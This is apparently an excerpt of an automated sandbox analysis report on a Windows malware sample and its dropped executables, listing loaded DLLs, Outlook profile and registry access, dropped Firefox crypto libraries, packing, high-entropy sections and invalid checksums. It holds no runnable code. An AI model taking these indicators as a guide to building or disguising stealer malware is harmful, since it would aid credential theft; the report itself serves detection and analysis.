Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: winmm.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wininet.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: sspicli.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: uxtheme.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: mstask.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.storage.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wldp.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: mpr.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: dui70.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: duser.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: chartv.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: oleacc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: atlthunk.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: textinputframework.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: coremessaging.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: ntmarta.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: wtsapi32.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: winsta.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: textshaping.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: propsys.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: explorerframe.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: iertutil.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: profapi.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: edputil.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: urlmon.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: srvcli.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: netutils.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: appresolver.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: bcp47langs.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: slc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: userenv.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: sppc.dll
Source: C:\Users\userKFHCAEGCBF.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 8NjcvPNvUr.exe

Static file information: File size 1955840 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 8NjcvPNvUr.exe

Static PE information: Raw size of lybfcffv is bigger than: 0x100000 < 0x1ac000

Source:	Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Unpacked PE file: 0.2.8NjcvPNvUr.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 9.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 12.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Unpacked PE file: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\userKFHCAEGCBF.exe	Unpacked PE file: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 19.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Unpacked PE file: 31.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 37.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

8_2_0041BA2C

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 8NjcvPNvUr.exe	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: random[1].exe.8.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: 1c593ec106.exe.7.dr	Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.8.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: axplong.exe.18.dr	Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd

PE file contains sections with non-standard names

Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: lybfcffv
Source: 8NjcvPNvUr.exe	Static PE information: section name: emchirzz
Source: 8NjcvPNvUr.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: lybfcffv
Source: explorti.exe.0.dr	Static PE information: section name: emchirzz
Source: explorti.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.7.dr	Static PE information: section name: .casiwid
Source: random[1].exe.7.dr	Static PE information: section name: .mufu
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .casiwid
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .mufu
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: freebl3.dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr	Static PE information: section name: .didat
Source: nss3.dll.8.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: .idata
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: lybfcffv
Source: random[1].exe.8.dr	Static PE information: section name: emchirzz
Source: random[1].exe.8.dr	Static PE information: section name: .taggant
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: lybfcffv
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: emchirzz
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .taggant
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: finyobjn
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: cveoqpqu
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: finyobjn
Source: random[1].exe0.8.dr	Static PE information: section name: cveoqpqu
Source: random[1].exe0.8.dr	Static PE information: section name: .taggant
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: .idata
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: finyobjn
Source: axplong.exe.18.dr	Static PE information: section name: cveoqpqu
Source: axplong.exe.18.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0032D84C push ecx; ret	7_2_0032D85F
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041A9F5 push ecx; ret	8_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB536 push ecx; ret	8_2_6C1FB549

Source: 8NjcvPNvUr.exe	Static PE information: section name: entropy: 7.987936779363103
Source: 8NjcvPNvUr.exe	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.987936779363103
Source: explorti.exe.0.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: random[1].exe.7.dr	Static PE information: section name: .text entropy: 7.812950396957531
Source: 8ec8c5c339.exe.7.dr	Static PE information: section name: .text entropy: 7.812950396957531
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.999400097848481
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.99076230675352
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.999175266136623
Source: random[1].exe0.7.dr	Static PE information: section name: entropy: 7.964571388660085
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.999400097848481
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.99076230675352
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.999175266136623
Source: 1c593ec106.exe.7.dr	Static PE information: section name: entropy: 7.964571388660085
Source: random[1].exe.8.dr	Static PE information: section name: entropy: 7.987936779363103
Source: random[1].exe.8.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: entropy: 7.987936779363103
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: entropy: 7.983363124481756
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: random[1].exe0.8.dr	Static PE information: section name: entropy: 7.983363124481756
Source: random[1].exe0.8.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: axplong.exe.18.dr	Static PE information: section name: entropy: 7.983363124481756
Source: axplong.exe.18.dr	Static PE information: section name: finyobjn entropy: 7.954291882741596

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
